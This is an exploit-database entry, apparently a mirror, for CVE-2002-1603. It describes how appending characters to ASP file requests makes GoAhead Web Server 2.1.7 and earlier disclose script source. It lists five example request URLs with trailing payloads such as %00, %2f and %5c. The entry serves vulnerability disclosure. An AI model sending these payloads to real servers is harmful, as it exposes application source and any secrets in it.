[] NeoSense
E X P L O I T S
title author type platform port cve id

GoAhead Web Server 2.1.x - '.ASP' File Source Code Disclosure

Author: Luigi Auriemma
type: remote
platform: windows
port: 
date_added: 2002-12-17 
date_updated: 2012-12-16 
verified: 1 
codes: CVE-2002-1603;OSVDB-13295 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/9239/info

A vulnerability in GoAhead webserver may result in the disclosure of the source code of ASP script files. The vulnerability occurs because the application fails to sanitize HTTP requests.

An attacker can append certain characters to the end of an HTTP request for a specific ASP file. As a result, GoAhead webserver will disclose the contents of the requested ASP script file to the attacker.

This issue affects GoAhead 2.1.7 and earlier.

http://www.example.com/asp.asp%00
http://www.example.com/asp.asp%2f
http://www.example.com/asp.asp%5c
http://www.example.com/asp.asp/
http://www.example.com/asp.asp
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.